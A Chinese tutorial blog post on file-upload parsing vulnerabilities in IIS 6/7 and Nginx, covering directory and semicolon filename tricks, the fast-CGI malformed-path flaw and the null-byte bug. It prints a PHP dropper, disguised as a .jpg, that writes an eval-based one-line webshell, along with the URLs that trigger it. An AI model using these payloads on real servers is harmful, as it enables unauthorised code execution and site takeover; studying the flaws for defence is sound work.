51. 文件上传篇——IIS解析漏洞原理

目录解析

当建立“*asp、*asa”格式的文件夹时,其目录下的任意文件都将会被IIS当做ASP文件来解析。

例如:建立文件夹parsing.asp,在parsing.asp文件夹下新建一个文本文件test.txt,其内容为<%=now()%>,然后在浏览器中访问,会发现test.txt会被当做ASP文件执行,在浏览器页面输出当前时间!

文件解析

当文件为“.asp;1.jpg”时,分号后面的不被解析。IIS6.0同样会以ASP脚本方式来执行!

例如:建立文件test.asp;1.jpg,内容为<%=now()%>,将会在浏览器页面输出当前时间。

IIS 7.0/7.5/Nginx<8.3畸形解析漏洞

Nginx解析漏洞是我国安全组织80sec发现的!

在默认Fast-CGI开启的状况下,黑客上传一个名字为wooyun.jpg,内容为

<?php fputs(fopen(‘shell.php’,’w’),’<?php eval($_POST[cmd]?)’);?>

的文件,然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马shell.php

Nginx<8.03空字节代码执行漏洞

影响版本:0.5,0.6,0.7<=0.7.65,0.8<=0.8.37

Nginx在图片中嵌入PHP代码然后通过访问 xxx.php%00.jpg 来执行其中的代码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值